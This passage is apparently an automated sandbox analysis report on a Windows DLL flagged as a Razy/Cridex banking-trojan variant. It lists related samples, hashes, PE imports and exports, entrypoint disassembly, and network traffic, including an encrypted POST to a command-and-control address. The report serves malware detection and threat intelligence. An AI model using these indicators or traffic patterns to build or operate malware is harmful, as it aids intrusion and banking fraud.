                                                                                                        SecuriteInfo.com.Variant.Razy.980776.17887.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9354.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.302.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.25001.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        ExtractedB64-B64Decoded.exeGet hashmaliciousBrowse
                                                                                                        • 144.202.13.247
                                                                                                        SecuriteInfo.com.UDS.Trojan-Banker.Win32.Cridex.gen.25607.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96

                                                                                                        JA3 Fingerprints

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        51c64c77e60f3980eea90869b68c58a8SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.17887.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9354.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.302.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.25001.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.UDS.Trojan-Banker.Win32.Cridex.gen.25607.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Trojan.Win32.Sabsik.FL.Bml.25404.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                                                                                        Category:dropped
                                                                                                        Size (bytes):61157
                                                                                                        Entropy (8bit):7.995991509218449
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                                                                                        MD5:AB5C36D10261C173C5896F3478CDC6B7
                                                                                                        SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                                                                                        SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                                                                                        SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):326
                                                                                                        Entropy (8bit):3.099972864116614
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:kKtdFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:D2kPlE99SNxAhUefit
                                                                                                        MD5:966943C4EFC9B33FA6A589D20860BFED
                                                                                                        SHA1:CCBF51C58D7595A2C30F9509082A137FA4654E4C
                                                                                                        SHA-256:A2B60F77A369F087EAE2C13434C2791227E59F2B7491FFFCA4B3A2F3E544D2B1
                                                                                                        SHA-512:D77D5CCA47A23F462F8325A07AA3C81CB35B088F4DA06F421249F8A6899FE2DEB03BD478101C1B7A76F4313F925FD9CB6186FE68D68D620654EF2501EAA77D9E
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview: p...... ..........i.....(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):6.439741617771986
                                                                                                        TrID:
                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:SecuriteInfo.com.Variant.Razy.980776.4470.dll
                                                                                                        File size:1375232
                                                                                                        MD5:c7cf1a1238e4a42eebf9cd70a5cf091c
                                                                                                        SHA1:4ac755ac7e852daa204caced88887bdfce48a57f
                                                                                                        SHA256:f0a31b853ed15c70abd7b13ebb381500188e61d4b8fdee1cd2a922d79a4d1e77
                                                                                                        SHA512:55e4d69ccd7a64a19621afedc114f01cd72f2f565a9e8a9eb5bf560438d65665561edd4bb0a2d3df79161a49c2d2ff4df2e68cc069aed02b6d9b1a6960044c3a
                                                                                                        SSDEEP:24576:0nxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7D:0cfk82uAJTI7DPswKwua
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........S.U.=.U.=.U.=..,..Q.=.\...O.=...?.Q.=...8.F.=...>.L.=...;.|.=..,..A.=.U.<...=...2...=...<.T.=.....T.=...>.T.=.RichU.=........

                                                                                                        File Icon

                                                                                                        Icon Hash:74f0e4ecccdce0e4

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x4336b0
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                        Time Stamp:0x5BBD86DE [Wed Oct 10 04:58:06 2018 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:6
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:6
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:6
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:ccbe70d6d0d02f6248ca160d6a0bb85b

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        cmp dword ptr [ebp+0Ch], 01h
                                                                                                        jne 00007F66B0E07B27h
                                                                                                        call 00007F66B0E08857h
                                                                                                        mov eax, dword ptr [ebp+10h]
                                                                                                        push eax
                                                                                                        mov ecx, dword ptr [ebp+0Ch]
                                                                                                        push ecx
                                                                                                        mov edx, dword ptr [ebp+08h]
                                                                                                        push edx
                                                                                                        call 00007F66B0E07916h
                                                                                                        add esp, 0Ch
                                                                                                        pop ebp
                                                                                                        retn 000Ch
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [0054806Ch]
                                                                                                        xor edx, edx
                                                                                                        mov ecx, 00000020h
                                                                                                        div ecx
                                                                                                        push edx
                                                                                                        mov edx, dword ptr [ebp+08h]
                                                                                                        xor edx, dword ptr [0054806Ch]
                                                                                                        push edx
                                                                                                        call 00007F66B0E07B64h
                                                                                                        add esp, 08h
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [0054806Ch]
                                                                                                        xor edx, edx
                                                                                                        mov ecx, 00000020h
                                                                                                        div ecx
                                                                                                        mov eax, 00000020h
                                                                                                        sub eax, edx
                                                                                                        push eax
                                                                                                        mov ecx, dword ptr [ebp+08h]
                                                                                                        push ecx
                                                                                                        call 00007F66B0E07B33h
                                                                                                        add esp, 08h
                                                                                                        xor eax, dword ptr [0054806Ch]
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                                        mov ecx, dword ptr [ebp+0Ch]
                                                                                                        ror eax, cl
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        call 00007F66B0E08EBDh
                                                                                                        push eax
                                                                                                        call 00007F66B0E49BC7h
                                                                                                        add esp, 04h
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        sub esp, 18h
                                                                                                        mov eax, dword ptr [ebp+00h]

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x1471900x6c.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1471fc0x28.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000x72b4.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x1431100x54.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1431680x40.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xc70000x184.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000xc5e2f0xc6000False0.442065922901data6.4781248897IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0xc70000x80aec0x80c00False0.534105734223data5.52055296156IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0x1480000x13ba00x1800False0.1875DOS executable (block device driverpyright)3.99635070896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x15c0000x72b40x7400False0.710264008621data6.69742088731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        KERNEL32.dllGetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

                                                                                                        Exports

                                                                                                        NameOrdinalAddress
                                                                                                        Bluewing10x49eed0
                                                                                                        Earth20x49efd0
                                                                                                        Masterjust30x49eb20

                                                                                                        Network Behavior

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 28, 2021 04:44:57.697280884 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:44:57.697323084 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:44:57.697465897 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:44:57.720228910 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:44:57.720257998 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:44:58.248492956 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:44:58.248651028 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:00.905421019 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:00.905451059 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:00.905803919 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:00.905872107 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:00.956618071 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:00.956773996 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:00.956866980 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:01.670440912 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:01.670523882 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:01.670671940 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:01.679336071 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:01.679377079 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:01.857713938 CEST49754808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:45:02.017347097 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:02.017538071 CEST49754808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:45:02.019695044 CEST49754808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:45:02.178284883 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:02.180129051 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:02.180244923 CEST49754808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:45:04.873534918 CEST49754808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:45:05.032200098 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.032458067 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.032540083 CEST49754808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:45:05.033545971 CEST49754808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:45:05.033744097 CEST49754808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:45:05.191919088 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.192060947 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.192089081 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.192131996 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.192151070 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.579915047 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.579957008 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.580094099 CEST49754808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:45:05.588696003 CEST49754808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:45:05.748291969 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.762017012 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:05.927361012 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.927464962 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:05.928914070 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.089112043 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.089162111 CEST44349757192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.089255095 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.094197035 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.095264912 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.095343113 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.111243010 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.125977993 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.126005888 CEST44349757192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.276961088 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.277069092 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.282375097 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.282541037 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.447794914 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.447828054 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.486299038 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.640497923 CEST44349757192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.640641928 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.833203077 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.833235025 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.833303928 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.833374023 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.840776920 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.936594963 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.936634064 CEST44349757192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.936899900 CEST44349757192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.937027931 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.955482006 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.955606937 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.955657005 CEST44349757192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.964852095 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.006103992 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.014190912 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.014384031 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.016547918 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.065592051 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.074626923 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.074647903 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.074729919 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.074769020 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.084959030 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.135117054 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.135226965 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.136121988 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.136277914 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.185216904 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.185512066 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.375144958 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.375186920 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.375257015 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.375289917 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.387031078 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.436152935 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.513472080 CEST49761443192.168.2.5192.46.210.220

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                        Oct 28, 2021 04:48:41.884382963 CEST8.8.8.8192.168.2.50x7e0eNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • 192.46.210.220

                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.549753192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:00 UTC0OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:00 UTC0OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:01 UTC4INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:01 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
